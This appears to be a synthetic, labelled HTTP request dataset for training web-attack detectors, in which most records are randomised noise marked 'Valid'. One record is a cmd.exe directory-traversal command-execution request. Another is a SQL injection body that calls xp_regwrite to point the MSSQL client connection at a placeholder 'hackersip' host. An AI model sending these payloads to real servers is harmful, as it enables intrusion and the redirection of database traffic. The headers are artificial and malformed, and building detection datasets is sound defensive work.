GET /jd/hrstdr/kXhHPyf0Y/w8lpaat/oPuMipRvh/ENeiSk3vlNIV/l53x0/qmlont/aa6vrik/shH7etenelftnnud/adab9heuirxnaw.html?e91saely=060459&eeEimTsfg=rcbf0uUem8drB&aldEecseeiEtn=em.TuHOTB&eD5eYtak7cs=1874&25_jF=eWQ6r_s0cr&io=Te8ymFe5PDSr%28bO&tpssdvE7r7ywtix=rt0nCaluo5&auooe5w=4522282814&napnumrrsxzdei=i%40tkdMX&arakttncid6eftf=mHqT.&sprtwga=sffcgmhj&Wskncts=R9on+&pTNanodejEZL1https=14&gioh9mae=rtkhbcAet HTTP/1.1
Host: www.sjioroi.org:01
Connection: 0nner5o
Accept: */*
Accept-Charset: utf-7, windows-1250, iso-8859-6;q=0.7
Accept-Encoding: compress;q=0.2
Accept-Language: *;q=0.8
Cache-Control: min-fresh=7
Client-ip: 223.50.40.121
Cookie: cipsrho=415
Cookie2: $Version="276"
Date: Mon, 20 Feb 06 22:51:31 UTC
ETag: "AN4.nNkM_srLbHg"
Expect: Ueo8n=huroAR68
From: 4aSoxaoo@yges.it
If-Modified-Since: Fri, 18 Jul 08 02:30:31 GMT
If-Unmodified-Since: Sun, 08 Jun 08 12:14:10 UTC
If-Match: "DTamJlMARellTpUQue-"
If-None-Match: "V6j1REIXnYcwDIkQg"
If-Range: *
Max-Forwards: 7144
MIME-Version: 0.0
Pragma: maulgmh='hfwtm'
Proxy-Authorization: r5le hmnr=ywltxE
Authorization: Digest cnonce="rlhc8"
Range: 516789-
Referer: http://eie4.com/moTNd.htm
TE: deflate,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/2.1 (Windows; U; Win 9x 8.3; xq-xo; rv:8.6.0) Gecko/44855458
UA-CPU: MIPS
UA-Disp: 661,945,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8177x498
Via: dgaae/2.2 252.96.117.151, 3.3 www.rsen.png:1
Transfer-Encoding: deflate
Upgrade: he2aGa/7.2, t4cmu/0.8
Warning: 341 98.142.108.251 "04lnsrolao" "Sat, 17 Jan 04 10:07:50 CET"
X-Forwarded-For: 118.211.6.212
X-Serial-Number: 0147669
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3455
Start - Id: 7860
class: Valid
POST /eoe/nam4m5rmn/muuteslstoe9Eie/Swhsas4khdagsdeddgvr/xss9n2tOvrM3bto/wzpgJCJ8ATX91IKb/9.I/tAbn-0vX_Wee/n64/llnlurani4el.mspx? HTTP/1.0
Content-Length: 66
Content-Language: air0h
Content-Encoding: compress
Content-Location: /st5sta/aaftyiet.conf
Content-MD5: emNvdnlpZG1sNWl1cTdycw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Jan 04 13:52:15 UTC
Last-Modified: Sun, 07 Aug 05 13:20:37 UTC
Host: www.nsiyedl.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: inzaoia-e, naes-ttht;q=0.3, ealgto-iS, rtl-6tqitdM;q=0.1, d0na9eae-whn46ou;q=0.2
Cache-Control: max-age=907
Client-ip: 84.201.37.41
Cookie: echodropkW9EzXZ=6605;6YreplaceI5HF=npth
Cookie2: $Version="69"
Date: Fri, 05 Nov 04 16:08:48 UTC
ETag: W/"YwtxEPhQKGO5rTI6lj"
Expect: 100-continue
From: NreEe@o6hqatue.gov
If-Modified-Since: Thu, 13 May 04 05:25:34 GMT
If-Unmodified-Since: Mon, 16 Nov 09 19:57:40 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1169
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: NTLM N3VveHVyb2hlcnR0RXRmbWVvb2VnRHRzZTFoZWJ0ZGxpbm90ZWV5bnVjaGFlcw==
Authorization: Digest response="B7853dDADfbB2187c39cdac5e1746Bd5"
Range: 3-90,72191-
Referer: /oageeT/sh6rlnnA/x5zSvoh.jpeg
TE: trailers
Trailer: TE
User-Agent: h6ehmejnmct7e
UA-CPU: MIPS
UA-Disp: 6357,331,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 669x1617
Via: 3.7 81.62.239.238, 5.5 www.BCnsoio.gif:9756, HTTP/9.0 66.230.58.63
Transfer-Encoding: sewrrh
Upgrade: e1efo/2.8, eie/7.2, 9tr/3.7
Warning: 393 www.e0nt7dn.jpeg "mel9ehnAlnr" "Sun, 07 Sep 08 05:30:02 UTC"
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 625088294062
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

x1rtr=e$selecta&Loncmh7trtNaU=Oos1&rahzHhaEwrews=]f&6-E3p5=Cax

End - Id: 7860
Start - Id: 44122
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 239.246.111.99
Connection: keep-alive
Accept: video/quicktime;q=0.5, audio/*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.8
Accept-Language: osrbku-sdl;q=0.1, tte-hickta, GhTn-drdoosbr
Cache-Control: min-fresh=962
Client-ip: 207.50.16.19
Cookie: YTCdivC=%e;IuXe=and
Cookie2: $Version="066"
Date: Mon, 12 Jul 04 17:28:04 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Thu, 27 Apr 06 12:55:33 CET
If-Unmodified-Since: Sun, 18 Jan 09 09:25:20 CET
If-Match: "ZVJ_DF5yd1hfEvLZHvS_"
If-None-Match: "v9taLmA2KHvsnCWYhh7H"
If-Range: Sat, 11 Apr 09 13:22:06 GMT
Max-Forwards: 46
MIME-Version: 9.5
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM Y3RzYnN2Y2VubG4xZTBjZG56ZW91aWxlV3RhbnlycGZldA==
Range: 2856-325921,765830-7785,3752-597
Referer: http://www.uofwoe.st/niSienos/obitml/EeqtneTi/h6iiavf/ofbejnse.txt
TE: trailers
Trailer: Date
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 9.4; Ht-lu; rv:8.8.5) Gecko/02839525
UA-CPU: x86
UA-Disp: 0410,9029,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: compress
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44122
Start - Id: 22006
class: Valid
GET /hop@oWXH4/MZs/5fS44ci37trrua8le/ibeln8saaRjgrtt/I.nT.HbGCLg.js?SIVhttps=4263&o2=8&sU._5Q6Bk=8Lf5bf&wYwYJ_locationsoxp_=t%40POOhPyHkR&0olasaxdz=eJIheYXV-h&rfdsA=rbteeCesrnOios&4h=yoeca96+&4fms6Ijdsmeut6=16957018&tqnaumjo=8419217 HTTP/1.0
Host: www.tnerenJrr.net
Connection: emSue
Accept: video/*;q=0.0
Accept-Charset: windows-874, us-ascii;q=0.9, iso-8859-6;q=0.6, iso-8859-4;q=0.0, isiri-3342;q=0.9
Accept-Encoding: deflate, compress, identity, gzip;q=0.3, deflate;q=0.7
Accept-Language: 5e3ionR-arnryEte;q=0.8, fl-xehqKrnH, onl-ow5nat;q=0.3, hzs-nsenpi
Cache-Control: min-fresh=006
Client-ip: 119.227.147.221
Cookie: tv7Hocehi=rotmp2iezlicatd2E i[Hinull
Cookie2: $Version="91"
Date: Sun, 01 Jun 08 06:14:13 CET
ETag: W/"y@a9fTus_RQlTN96"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Tue, 04 Sep 07 19:54:46 UTC
If-Unmodified-Since: Sun, 09 Nov 08 13:57:52 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Mar 08 01:24:48 CET
Max-Forwards: 665
MIME-Version: 2.6
Pragma: ewzEn0gs='etHss'
Proxy-Authorization: Basic b2ROb2V2Om9sYTc=
Authorization: NTLM YWVha2VoZXllYWljMGx5aG5oc2hybmU4Ynl0c2V0YnJvc0xKbGVvbmE=
Range: 048-5458,87200-
Referer: http://www.orua.org/Vpnwrhb/hSdEe/Tivioo/frKegec.shtml
TE: gzip;q=0.8
Trailer: Expect
User-Agent: Aeotyoehls (g1unc0N-ew; oH8l-IV_7)
UA-CPU: Sparc
UA-Disp: 514,290,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3071x562
Via: FTP/5.1 www.xlhan.js
Transfer-Encoding: deflate
Upgrade: pufgp/8.1, Wcil/8.8
Warning: 733 11.89.186.149:80395 "miozden" 
X-Forwarded-For: 167.167.68.206
X-Serial-Number: 920022590702
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22006
Start - Id: 24334
class: Valid
GET /nIS4U1bs5j-M5NC/dBW-KnKZ/He/bn9cfPLXw@1X6SUX@y/imdennutlhdos/yRUDRvEW-hRKw/nLiaojn0u3B/5V9cMpZ.cfm?lSuhsz=%3Cneuad&Sl@.hBS=u9perlluue%29%40iframee%40o&Clr3inen=ufIaZB&itypa=Cnnhmmaenta&7RlaoKsply=6226531&pRnl0amOb0r=7123833984 HTTP/1.1
Host: www.lneRtwagn.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: vrua-louia;q=0.6, tg-e;q=0.5, fooN-m, p3hi-hp1dri2h, seeewia-ytat87s;q=0.9
Cache-Control: only-if-cached
Client-ip: 203.77.28.44
Cookie: vz=khNnireyaon;47sios=03718067
Cookie2: $Version="7"
Date: Wed, 04 Oct 06 01:04:17 GMT
ETag: "WG4ET8aLtnpGZfQSjuAb"
Expect: cefsv=ghaeeUc;vsoa4eh=lhIdpaie
From: R7wybte@tabs5a.fr
If-Modified-Since: Mon, 06 Feb 06 10:18:48 UTC
If-Unmodified-Since: Sat, 06 Sep 08 23:10:56 CET
If-Match: "c2Tyv3dN5TA2zQ63h2Tk"
If-None-Match: *
If-Range: "kJuYqzpit3vWV71o"
Max-Forwards: 8410
MIME-Version: 9.0
Pragma: a8g=fsm
Proxy-Authorization: sdipe ouneodh=Rermt
Authorization: Digest opaque="cdXneh"
Range: 3174-4551,6064-
Referer: http://0a7Iltae.uk/shphg/otrz/hydsOzy.txt
TE: gzip
Trailer: Referer
User-Agent: zed2Qbde (lS8.HK3f; hD8.zd; s-sW@PDp; wKwqfR04J)
UA-CPU: StrongARM
UA-Disp: 515,9191,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 352x5203
Via: 9.5 145.154.134.153:51883, trth/4.0 www.at3sucrh.html, FTP/3.7 27.25.48.247
Transfer-Encoding: deflate
Upgrade: otnks/1.0, smdrt/6.1
Warning: 189 www.Wti6r.tiff "Tpeaaepto6Oncyta" "Mon, 01 Jun 09 20:09:31 CET"
X-Forwarded-For: 153.46.193.204
X-Serial-Number: 32982320313
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24334
Start - Id: 32262
class: Valid
GET /nYr65nCmqsZ20YPOu/oriAeoolaOyetthps/remtfesoiena/HlatHh/st1uimc/Pa.shtml? HTTP/1.0
Host: 92.102.220.143:3
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity;q=0.8, identity;q=0.0, gzip;q=0.5, identity;q=0.1, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 195.218.193.79
Cookie: hieegEeS=trotr6eusrnntRun
Cookie2: $Version="518"
Date: Sun, 12 Apr 09 24:12:20 UTC
ETag: W/"mPGh3SeD1JfvyjkXwgc1"
Expect: dEvf=ealzsyq
From: ajtRne@yawe.com
If-Modified-Since: Sat, 21 May 05 01:18:02 GMT
If-Unmodified-Since: Thu, 30 Nov 06 11:23:29 GMT
If-Match: *
If-None-Match: "BhjQZmyXd5HF0A1"
If-Range: Mon, 27 Sep 04 18:18:29 GMT
Max-Forwards: 1
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: srie 7y85rp=eaTsher
Authorization: Basic ZnR1b1RhNzoxZjhlZQ==
Range: -265,3-,-2
Referer: http://www.pndixoo.be/pyT5o.asp
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/3.4 (X11; U; Open BSD i586 2.8; rc-oa; rv:1.5.1) Gecko/51631011
UA-CPU: PowerPC
UA-Disp: 8350,6514,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2503x5889
Via: HTTP/8.9 www.sebtaf.gif
Transfer-Encoding: identity
Upgrade: skeho/2.7
Warning: 276 144.197.192.204 "hsEwst6bs9l" "Wed, 19 Mar 08 20:42:32 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 23704390818995644
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32262
Start - Id: 17471
class: Valid
GET /e3woG0gs8hl/rwjoo4Sr150eu/ntmfqieps5ly/iodgecturinurho9crn/z35ICBNGB-Pmz-/-Tbinm3G8E/hvjnkduo.mspx?EtDtanmnbtra=67416600&NDh.DQrm=alhdeekhdm0n&igrsiaH2X=6srsr0eeh&dgnbmids9nEtm=95410&32Q5cg7Kaccept=008425&mb=3479879306&TyoaotVSt=1&ilr8=rn6o&allpZYXb=++r&YvwpasswdUxb0l=4&-XS00RhnetcatB=positioni44m8 HTTP/1.0
Host: www.tfrtdajeL.net
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1255, windows-874, cp-936;q=0.0, iso-8859-6;q=0.5, windows-1253;q=0.7
Accept-Encoding: *
Accept-Language: eizdwta-raN;q=0.8
Cache-Control: no-cache
Client-ip: 97.68.166.85
Cookie: hvdottaf=mR(cow;3ka=54882;v116Mitbi=hnm1srb6itngds;7BlibUSB-7=7075352601;cysedmGrtqh1=lyvbZHB9
Cookie2: $Version="41"
Date: Sat, 28 May 05 02:20:33 UTC
ETag: W/"W2xAl6_IAi_.dUMclZyL"
Expect: aunieea5
From: tNsfulie@nnnmlx.gov
If-Modified-Since: Fri, 22 Oct 04 05:06:59 GMT
If-Unmodified-Since: Sat, 26 Nov 05 24:11:26 GMT
If-Match: "3RCDWjIhFfTcPJGtnRJ"
If-None-Match: "22zmgpXDcANqG-S"
If-Range: Sun, 11 Apr 10 01:34:32 GMT
Max-Forwards: 943
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: orneh aFtiplho=otgEmrk
Authorization: Digest uri=http://www.iNnoeIh.it/jsef4/Ut2o8Nn/qtfuv/slafUno/aolnfu.php4
Range: -46060,-501912,285072-125
Referer: http://www.4dtros6.be/yaHcttyf.jpg
TE: gzip;q=0.5
Trailer: If-None-Match
User-Agent: dzievp (hmfFJF6Eq8; qKy.ZpB; sBf_a0; vO-dIsVd; ea8WroYY)
UA-CPU: MIPS
UA-Disp: 5103,184,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 767x663
Via: 2.6 174.249.147.21:45842
Transfer-Encoding: gzip
Upgrade: 8yndaa/8.9, dn8nen/3.7
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17471
Start - Id: 31850
class: Valid
GET /joa8x4ihseYenicozh/mdiit1aeRmdpn2nsgc/hFrxoKSpE/7UCwxM/tgT.RkXBy3UsMy1CU/xZhimj@Dfea8yTyW/i4g4PpB.u54/4OcuTPdh3KXt/ipXtbO/iD-CfumZ/yBu1eW.css?NNlU=%5D%24pmfttidr%7ClntaGo7rt HTTP/1.0
Host: www.eoharoqb.st
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.6, identity, compress;q=0.8, identity;q=0.4, gzip;q=0.7
Accept-Language: *
Cache-Control: max-stale=977
Client-ip: 228.166.151.148
Cookie: HToOotIepn=hoid~xeEiZ%weh;nodeEKlFt0A1=ib;TN=9884850569;9JGFDZF1x=3hoVe>rncad
Cookie2: $Version="0"
Date: Mon, 31 Aug 09 01:38:35 CET
ETag: "pRAw-lDREXdikE39iG"
Expect: 100-continue
From: dTummj@ncsar.de
If-Modified-Since: Mon, 24 Jan 05 05:39:58 UTC
If-Unmodified-Since: Mon, 17 Dec 07 12:21:07 CET
If-Match: "_HQXw_BR_ND7_MRK3G_n"
If-None-Match: *
If-Range: *
Max-Forwards: 5395
MIME-Version: 2.6
Pragma: u=cton
Proxy-Authorization: NTLM TzB5dXJPcklpZG5lZXR0YzJ0OXczZXNucTh0bXRhZW5Rcm5tYTJ0ZHN0eHVpaQ==
Authorization: N4Xe oiqeioqt=4N1ldir
Range: -86
Referer: http://www.h001Pi.it/ei0o/ouh6aI/rHboeaze/fbtMF1/nsscnj.gz
TE: gzip;q=0.2
Trailer: Trailer
User-Agent: 5aldetn/6.0.4.3.5
UA-CPU: Sparc
UA-Disp: 753,4459,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 2241x014
Via: FTP/2.6 186.133.235.107, FTP/4.8 137.121.137.148, FTP/1.8 www.ecxgei.html
Transfer-Encoding: compress
Upgrade: emhps/3.5, Steh/4.0, aieted/4.2, iro9te/2.8, are/6.4
Warning: 642 www.exea.js "itnaecJ83fHskar" 
X-Forwarded-For: 236.36.151.129
X-Serial-Number: 69375200108238652611
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31850
Start - Id: 41008
class: SqlInjection
POST /frtfedlApt6ucseS/o8oqeJc8/atwr9ostswe1/updateAgVreplacedXF/nSjNKEPNn1eQ/ltqPVxLP/hhmbasqt3aocsseh1rna/lG-wLMWuk042hMk.css? HTTP/1.0
Content-Length: 239
Content-Language: eu,eekt
Content-Encoding: compress
Content-Location: http://ciehAte.st/wsowa/cilm/nhgruun/qt0EE/rehI.cgi
Content-MD5: MmVpbGFldTlvb3JsZW50RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Jun 07 06:04:35 UTC
Last-Modified: Thu, 07 May 09 11:08:51 CET
Host: 179.76.196.239
Connection: close
Accept: application/*;q=0.6, text/*, audio/basic
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.6, compress;q=0.5
Accept-Language: tjfnosoz-ttmdN, r5tfa-lbnz;q=0.0, ac-tbMwbi;q=0.1, ln-ijloisa, cl-Ko6aasr
Cache-Control: max-age=40
Client-ip: 103.167.168.13
Cookie: cl74agnripjeav=85759520;rh=44760;dmSoStOw=g
Cookie2: $Version="131"
Date: Tue, 28 Dec 04 06:35:54 UTC
ETag: W/"yB2VYqpUnbgTE.vlG9"
Expect: v0sro3=eghTm;eprtAa2
From: asetiay@nrooel.de
If-Modified-Since: Sat, 13 Jan 07 05:54:25 UTC
If-Unmodified-Since: Wed, 06 Aug 08 14:32:16 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Nov 06 03:09:49 CET
Max-Forwards: 7
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest response="Da7EBFf2e6D8F588b475adAdda612ba3"
Authorization: 9etso itrab=ohxvo2N
Referer: http://www.irmtr.fr/Keah/Tfes/erNeuNr.jpeg
TE: trailers,gzip
Trailer: Expect
User-Agent: rvtla/9.0.7.9.6
UA-Pixels: 892x2342
Via: 9.1 204.101.191.39:95704, FTP/4.1 170.126.25.12
Transfer-Encoding: identity
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 134.103.78.204
X-Serial-Number: 0694203566390094
----: --------------------------

eeDtv=49259&6nFrc7ehaNcdev=sn0p.6FIEhg&67afI98U=exec    xp_regwrite   'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','oltjmiehnA','REG_SZ','DBMSSOCN,hackersip,80'&roNgk=vndOdE

End - Id: 41008
Start - Id: 10357
class: Valid
GET /iwX/elran6tmsdcs/a0mhnbUJVMp5wwaODe-/XH/XA8execusamzdelete/.4hCNservicesakgtPrbS/MYglxh2abll6/ige-Yc9Q3bXb1hlcg/GXgroup byIZt9kKQusrX.dll?wQnodeHmKDshutdownH=t%40rN%402Ssoiss&-9linkGF4=Q%40O%3E0nvar&e1dqoeenaftr=309712&rb9heeperftomi=%3DuE1hP2nncyH&dTf10e1h6to=753450&sO=o%2Fltomytrun9loo HTTP/1.0
Host: www.espntn.biz:6
Connection: close
Accept: audio/x-wav
Accept-Charset: iso-10646-ucs-2;q=0.5, euc-jp;q=0.3, x-mac-icelandic;q=0.0, x-mac-korean, iso-2022-jp;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 95.195.225.89
Cookie: 2Hna10d=ieaotnph-I7=%lit;rilnsiri9e=yCaitl7rRqhi1u;8aomirnsurmn5n=812;ryenA=mmXk;mieS10hye=17;stahn=salog
Cookie2: $Version="123"
Date: Fri, 04 Apr 08 12:40:06 UTC
ETag: W/"RC1hk2Sp38cGZQzla3.C"
Expect: 100-continue
From: ttshinja@3PStlfueE.gov
If-Modified-Since: Sun, 11 Dec 05 16:43:23 CET
If-Unmodified-Since: Tue, 19 Jun 07 23:25:04 UTC
If-Match: "vahSFrjSQ6F_5AQ_8"
If-None-Match: "9@apQt-NFQ_dplf9Yh"
If-Range: *
Max-Forwards: 70
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic ZGE5ZTpwZXJRYXR1Yg==
Authorization: Digest algorithm=MD5-sess
Range: 029-
Referer: /trri/4HxN4.css
TE: trailers,deflate;q=0.8
Trailer: Pragma
User-Agent: Mozilla/0.5 (compatible; MSIE 1.1; Unix; sesee)
UA-CPU: 68000
UA-Disp: 6878,6182,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 164x0597
Via: 3.6 239.218.186.38:3, 3.0 www.erh6.css
Transfer-Encoding: gzip
Upgrade: tode/1.3
Warning: 789 148.216.97.93 "he2Hr6c" "Thu, 03 Aug 06 14:02:34 CET"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10357
Start - Id: 23751
class: Valid
GET /s8BDLps/osOmR/hS1tFa1mA_oF/bstdint7JeKNrO4bfP/w7/Needqa0/ire4xDV@Hj57E5/nAk@.tiff?s9fibdehe=da&wnntsennanCE=fiG&ttOlsesbaNi1lvM=6 HTTP/1.1
Host: 231.154.180.24
Connection: lton
Accept: image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=291
Client-ip: 162.99.120.131
Cookie: scateihm=dof ere;ea2ooisner= i;eronff=h6;ZnZNJCbc=bL7wy8BEanW;t9ntotifahbneo=s81ykG3.BN3k
Cookie2: $Version="93"
Date: Wed, 24 Sep 08 09:43:21 CET
ETag: "uhuVGtTX8ksUIS7R3"
Expect: tteedng=e8dtDpe
From: tddnc@aNensle3pe.org
If-Modified-Since: Sun, 15 Jun 08 12:37:12 UTC
If-Unmodified-Since: Sun, 22 Nov 09 12:21:16 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 59
MIME-Version: 5.6
Pragma: 34='ramIee'
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: eeie reun=10ditrSt
Range: 20-,-643631
Referer: /e3cc/rnir/HhoLmc/a9josi/dfn8pns.css
TE: gzip;q=0.7,trailers
Trailer: Pragma
User-Agent: dwKF.N0HZL http://www.8nuac.org
UA-CPU: x86
UA-Disp: 6313,5810,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 431x276
Via: 5.9 www.e5eyone.tiff:0, 6.2 www.ktuxeq6.htm
Transfer-Encoding: gzip
Upgrade: eee/2.2, 9lR/4.1
Warning: 754 111.149.39.187 "E4v7ars1jmvnre" "Mon, 09 Aug 04 19:29:50 CET"
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 13224
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23751
Start - Id: 11005
class: Valid
GET /tE01Yf._YP/s_lLb.js?bewianegae=+nH HTTP/1.0
Host: 116.59.194.172
Connection: keep-alive
Accept: text/*;q=0.6, video/*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 201.77.21.42
Cookie: a5=ttcnfeKeEahsystemsHpya
Cookie2: $Version="17"
Date: Wed, 03 Jan 07 24:00:30 CET
ETag: "iQfD58USLgrSmKWyKC"
Expect: aeeo7Dei=wsbejae;nipawec
From: Oimrip@itut.fr
If-Modified-Since: Fri, 13 Nov 09 16:25:36 CET
If-Unmodified-Since: Wed, 13 Aug 08 03:39:18 CET
If-Match: *
If-None-Match: "yLcLVPjvfHxetIr"
If-Range: Sat, 13 Nov 04 23:44:00 GMT
Max-Forwards: 0359
MIME-Version: 9.8
Pragma: atsoss='Mizeaaa'
Proxy-Authorization: ayTqd ipelosnh=nhw7hz
Authorization: Basic Tm5tMHNlb2I6c3doc3RpaQ==
Range: 68-612
Referer: http://www.rc4tri9n.de/osebrqr/wi9s/toiei/D4s9dhar.mpg
TE: chunked;q=0.2,chunked,gzip;q=0.2
Trailer: Date
User-Agent: sxinObR/8.9.5
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 124x705
Via: 6.5 186.114.166.165, FTP/2.6 186.117.224.63
Transfer-Encoding: deflate
Upgrade: Enfrte/3.8, el1/4.8, i8r/0.7, 7AJjip/7.1
Warning: 404 55.233.111.251 "hwzpimntn" 
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11005
Start - Id: 4722
class: Valid
POST /e975HJ/anr/gDt0S8U.b/5iD.b5fG/jerzrvbf/sjreOPC.Z7KfJrxMK-q/cJptQ_eqAEmrmALhIMLB/b08.jsp? HTTP/1.1
Content-Length: 107
Content-Language: xete6ia,r1OyBf,oxzSneer
Content-Encoding: gzip
Content-Location: /eEir/dstt/m4xho9ct.tiff
Content-MD5: aGRhaW10aDhlYWVhaWxkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Mar 08 21:36:39 CET
Last-Modified: Thu, 18 Feb 10 24:25:50 UTC
Host: www.Oadengccu.org
Connection: keep-alive
Accept: image/png;q=0.8, image/*;q=0.8, text/xml;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: nersa-0o;q=0.2, n-ottieuhi;q=0.7, IOUn-oogtot, ohh-s;q=0.0
Cache-Control: no-cache
Client-ip: 144.212.63.69
Cookie: jmgsuO8Fo_Ew=967;inputkTf@WN=s4yh3Vx;sw9easIt4w6o=saeol;sFZq8_imgnetcatJH6O=ffGuWbpht
Cookie2: $Version="3"
Date: Fri, 07 Jan 05 04:04:16 UTC
ETag: "BVeg.7@Abxsk0PBMV"
Expect: iokxesrg
From: pmneeca@slr7xi.cz
If-Modified-Since: Mon, 03 May 04 16:11:48 GMT
If-Unmodified-Since: Sun, 21 Sep 08 17:25:39 UTC
If-Match: *
If-None-Match: *
If-Range: "bO7l5k0xuNAse2m"
Max-Forwards: 1
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM NmdycnBldm9hb3Z6Yml1bU00aWxjZWRzcmFyZGVlbGVFZXJ0YUN0Y2NlUXNu
Authorization: Basic d29kZTplbmxvZQ==
Range: 22-2,-49
Referer: http://www.h0unmsle.uk/nDhonhmt/zreoefd/atfo/4jsce1d/sd9ee.txt
TE: trailers
Trailer: Expect
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 4.7; Id-eo; rv:4.1.3) Gecko/97005481
UA-CPU: MIPS
UA-Disp: 9334,500,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 868x5971
Via: 9.7 www.nEaN.shtml
Transfer-Encoding: identity
Upgrade: gto1/9.1, noos/2.9, su2trm/7.6, u0Ntk/3.5
Warning: 097 www.nireajto.jpeg "egeNTsmuczf3" "Wed, 07 Jun 06 23:53:54 UTC"
X-Forwarded-For: 121.38.195.75
X-Serial-Number: 64993875
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-A9a=c&tbOd=4&72HKvd=?oenesf&ytm5naDyrtkl=9pj&exobmbheaRi=3601495&tgi=connect$gi&yqNt=81&si=son7uacelsN

End - Id: 4722
Start - Id: 20645
class: Valid
